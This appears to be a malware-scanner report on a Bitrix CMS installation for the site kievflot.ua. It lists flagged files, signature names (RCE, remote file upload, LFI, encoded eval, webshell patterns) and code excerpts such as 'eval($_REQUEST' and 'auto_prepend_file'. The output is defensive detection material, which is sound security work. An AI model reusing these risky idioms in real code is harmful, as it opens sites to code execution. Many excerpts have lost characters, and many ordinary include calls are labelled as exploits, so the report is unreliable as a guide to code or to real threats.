/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/60/6021ba8a3c2d97491c48a0378e94ed76.php

Size: 485.50 kB Created: 2024-03-03 11:07:45 Modified: 2024-03-03 11:07:45 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 4083 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/18/184039ea1c1c3bed2beda7474c15ea8e.php

Size: 485.83 kB Created: 2024-03-03 11:07:46 Modified: 2024-03-03 11:07:46 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 4083 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

/var/www/kievflotq/kievflot.ua/bitrix/cache/s1/bitrix/catalog.section/eb/eb7c928b63ac38019b21db6a0593fe64.php

Size: 70.29 kB Created: 2024-03-03 10:42:12 Modified: 2024-03-03 10:42:12 Dangers: 1
DescriptionMatch

Sign 34b7e999 Line: 531 Dangerous

Malware Signature (hash: 34b7e999)

dMT0JBTF

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/user.php

Size: 7.37 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit download_remote_code2 Line: 197 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"<?include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")

Exploit execution Line: 197 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include(\$_SERVER[\"DOCUMENT_ROOT\"].\"/bitrix/modules/security/options_user_settings_1.php\")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/post_filter.php

Size: 7.08 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 162 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"\n------------------------------\n\$_SERVER:\n")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/antivirus.php

Size: 44.22 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit download_remote_code2 Line: 528 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($f"\n------------------------------\n\$_SERVER:\n")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/system_information.php

Size: 8.31 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Function strrev eval_strrev Line: 377 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

LAVE

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/iprule.php

Size: 30.43 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 1239 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/security_403.php")

Exploit execution Line: 976 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/admin/security_403.php')

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/tests/environment.php

Size: 13.68 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

[https://www.php.net/posix_getpwuid]

posix_getpwuid($uid); return sprintf('%s(%s)'$uid['name'], $uid['uid']); } return $uid; } protected static function formatGID($gid) { if(is_callable("posix_getgrgid")) { $gid posix_getgrgid($gid); return sprintf('%s(%s)'$gid['name'], $gid['gid']); } return $gid; } protected static function formatFilePermissions($perms) { if (($perms 0xC000) == 0xC000) { $info 's'; } elseif (($perms 0xA000) == 0xA000) { $info 'l'; } elseif (($perms 0x8000) == 0x8000) { $info '-'; } elseif (($per...

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/classes/general/event.php

Size: 5.49 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function syslog Warning

Potentially dangerous function `syslog`

[https://www.php.net/syslog]

syslog($this->syslogPriority$message); } if ($this->isFileEngineActive) { if (!$message$message $this->messageFormatter->format($auditType$itemName$itemDescription); $message = static::sanitizeMessage($message); $message .= "\n"$savedInFile file_put_contents($this->filePath$messageFILE_APPEND) > 0; } return ($savedInDB || $savedInSyslog || $savedInFile); } public static function getSyslogPriorities() { return static::$syslogPriorities; } public static function getSyslogFaciliti...

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/install/index.php

Size: 10.92 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 211 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/ru/admin/security_antivirus.php

Size: 3.09 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit file_prepend Line: 12 Dangerous

LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine

php_value auto_prepend_file

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/classes/general/tests/environment.php

Size: 5.08 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 20 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/classes/general/tests/php_configuration.php

Size: 5.02 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 25 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/bitrix/modules/security/lang/en/admin/security_antivirus.php

Size: 2.24 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit file_prepend Line: 13 Dangerous

LFI (Local File Inclusion), prepending a file at the bottom of every others PHP files, allow remote attackers to inject and execute arbitrary commands or code on the target machine

php_value auto_prepend_file

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/lib/model/section.php

Size: 1.02 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Line: 40 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($entity)

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/classes/general/subelement.php

Size: 50.47 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(\''.CUtil::JSEscape($this->onLoadScript).'\');'; echo '</script></body></html>'; } else { if($this->onLoadScript) echo '<script type="text/javascript">'.$this->onLoadScript.'</script>'; echo $string; } define("ADMIN_AJAX_MODE"true); require($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin_after.php"); die(); } elseif ($_REQUEST["mode"]=='excel') { header("Content-Type: application/vnd.ms-excel"); header("Content-Disposition: filename=".basename($APPLICATION->GetCurPag...

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_subelement_edit.php

Size: 68.17 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Dangers: 5
DescriptionMatch

Exploit execution Line: 1810 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/subproduct_edit.php")

Exploit execution Line: 604 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBlock["EDIT_FILE_BEFORE"])

Exploit execution Line: 612 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBTYPE["EDIT_FILE_BEFORE"])

Exploit execution Line: 705 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/subproduct_edit_validator.php")

Exploit execution Line: 841 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/subproduct_edit_action.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_element_edit.php

Size: 113.94 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Dangers: 6
DescriptionMatch

Exploit execution Line: 1089 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/product_edit_action.php")

Exploit execution Line: 1774 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$customFormFile)

Exploit execution Line: 2979 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/product_edit.php")

Exploit execution Line: 709 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBlock["EDIT_FILE_BEFORE"])

Exploit execution Line: 717 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arIBTYPE["EDIT_FILE_BEFORE"])

Exploit execution Line: 842 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/catalog/admin/templates/product_edit_validator.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/admin/iblock_subelement_generator.php

Size: 28.34 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(arFileProperties),
            id 0;
        if(BX('ib_seg_max_property_id'))
        {
            id BX('ib_seg_max_property_id').value;
            if(id >= obPropertyTable.AR_FILE_PROPERTIES.length 2)
            {
                return;
            }
            BX('ib_seg_max_property_id').value Number(BX('ib_seg_max_property_id').value) + 1;
        }
        obPropertyTable.SELECTED_PROPERTIES[id] = 'DETAIL';

        var propertySpan BX('ib_seg_property_span');
        if(propertySpan)
        {
            var options = [];
            for(var key in fileProperties)
            {
                if(fileProperties....

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.link.list/component.php

Size: 1.14 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 19 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FN}

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.filter/component.php

Size: 32.43 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 61 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.smart.filter/component.php

Size: 27.62 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 523 Warning

Double var technique is usually used for the obfuscation of malicious code

${$FILTER_NAME}

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.element/templates/.default/template.php

Size: 64.84 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit clever_include Line: 1114 Dangerous

LFI (Local File Inclusion), through a image inclusion, allow remote attackers to inject and execute arbitrary commands or code on the target machine

INCLUDE' => $arParams['PRICE_VAT_INCLUDE'],
                                'CONVERT_CURRENCY' => $arParams['CONVERT_CURRENCY'],
                                'BASKET_URL' => $arParams['BASKET_URL'],
                                'ADD_PROPERTIES_TO_BASKET' => $arParams['ADD_PROPERTIES_TO_BASKET'],
                                'PRODUCT_PROPS_VARIABLE' => $arParams['PRODUCT_PROPS_VARIABLE'],
                                'PARTIAL_PRODUCT_PROPERTIES' => $arParams['PARTIAL_PRODUCT_PROPERTIES'],
                                'USE_PRODUCT_QUANTITY' => 'N',
                                'PRODUCT_QUANTITY_VARIABLE' => $arParams['PRODUCT_QUANTITY_VARIABLE'...

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.sections.top/component.php

Size: 19.13 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 180 Dangerous

Malware Signature (hash: 11413268)

eval($_REQUEST

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/scripts_for_editor.php

Size: 14.80 kB Created: 2017-11-21 16:21:44 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(scripts[s].JS);
                        }
                    }

                    BX.ajax.processScripts(scriptstrue);
//                    commentEr object may be set in template
                    if(window.commentEr && window.commentEr == "Y")
                    {
                        BX('err_comment_'+this.id[1]).innerHTML data;
                    }
                    else
                    {
                        if(BX('edit_id').value 0)
                        {
                            var commentId 'blg-comment-'+this.id[1];
                            if(BX(commentId))
                            {
                                var newComment BX.create('div',{'html':data});    // tmp container for data
//                                paste resp...

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog.comments/templates/.default/bitrix/blog.post.comment/adapt/template.php

Size: 31.88 kB Created: 2017-11-21 16:21:43 Modified: 2023-06-30 13:57:52 Dangers: 3
DescriptionMatch

Exploit execution Line: 185 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/neweditor.php")

Exploit execution Line: 29 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/script.php")

Exploit execution Line: 30 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$templateFolder."/scripts_for_editor.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/rss.show/component.php

Size: 2.52 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('&$val, $key''$val=htmlspecialcharsex($val);')); elseif($arParams["PROCESS"] == "TEXT"array_walk_recursive($arResultcreate_function('&$val, $key''$val=str_replace(array("    ", "\\r\\n"), array("&nbsp;&nbsp;&nbsp;&nbsp;", "<br>"), HTMLToTxt($val));')); $this->IncludeComponentTemplate()

/var/www/kievflotq/kievflot.ua/bitrix/modules/iblock/install/components/bitrix/catalog/templates/.default/section.php

Size: 2.44 kB Created: 2017-05-21 22:21:42 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 76 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

/var/www/kievflotq/kievflot.ua/bitrix/modules/subscribe/install/index.php

Size: 8.65 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 125 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/subscribe/install/events.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/socialservices/classes/general/authmanager.php

Size: 42.92 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 1505 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST[self::OAUTH_PACK_PARAM])

Exploit nano Line: 193 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

$service["CLASS"]()

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformfield.php

Size: 22.17 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformstatus.php

Size: 17.77 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_cform_old.php

Size: 9.20 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 77 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path.$template)

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformvalidator.php

Size: 7.56 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformresult.php

Size: 67.99 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformanswer.php

Size: 7.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_cformresult_old.php

Size: 7.20 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 78 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path.$template)

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callformoutput.php

Size: 33.92 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.$this->__cache_tpl.'<?'); $strReturn ob_get_contents(); ob_end_clean(); return $strReturn; } else { return false; } } function IncludeFormTemplate() { global $APPLICATION; if ($this->__check_form_cache()) { $APPLICATION->SetTemplateCSS("form/form.css"); $FORM =& $this; eval($this->__cache_tpl); return true; } else { return false; } } function isStatisticIncluded() { return CModule::IncludeModule("statistic"); } function __check_form_cache() { global $CACHE_MANAGER; if (strlen($this->...

Sign 11413268 Line: 100 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/general/form_callform.php

Size: 65.17 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 2 Dangers: 1
DescriptionMatch

Exploit double_var2 Line: 522 Warning

Double var technique is usually used for the obfuscation of malicious code

${$var}

Exploit double_var2 Line: 532 Warning

Double var technique is usually used for the obfuscation of malicious code

${$var2}

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformvalidator.php

Size: 368.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformfield.php

Size: 413.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformanswer.php

Size: 418.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformstatus.php

Size: 5.58 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformoutput.php

Size: 400.00 B Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cformresult.php

Size: 15.00 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 12 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/classes/mysql/form_cform.php

Size: 6.01 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module_id."/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/options.php

Size: 17.96 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(data.URL);
        if (!res)
        {
            var proto data.URL.match(/\.bitrix24\./) ? 'https' 'http';

            data.URL proto '://' data.URL;
            res r.exec(data.URL);
        }

        if (res)
        {
            data.URL_SERVER res[1]+'://'+res[2];
            data.URL_PATH res[3];
        }
    }

    if (!data.AUTH_HASH)
    {
        var content '<div class="form-crm-settings"><form name="form_'+popup_id+'"><table cellpadding="0" cellspacing="2" border="0"><tr><td align="right"><?=CUtil::JSEscape(GetMessage('FORM_TAB_CRM_ROW_TITLE'))?>:</...

/var/www/kievflotq/kievflot.ua/bitrix/modules/form/admin/form_field_edit.php

Size: 31.00 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('function() {FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();}');
            arInputs[i].onchange = new Function('FIELD_TYPE_CHANGE(\'' + (rows_count+1) + '\'); jsFormValidatorSettings.UpdateAll();');
        }

        if (new_name == 'MESSAGE_' + (rows_count+1))
        {
            arInputs[i].onchange jsFormValidatorSettings.UpdateAll;
        }
    }

    var input1 BX.create('INPUT', {
        props: {
            type'hidden',
            name'ANSWER[]',
            valuerows_count 1
        }
    }),
        input2 BX.create('...

/var/www/kievflotq/kievflot.ua/bitrix/modules/highloadblock/lib/highloadblock.php

Size: 17.42 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

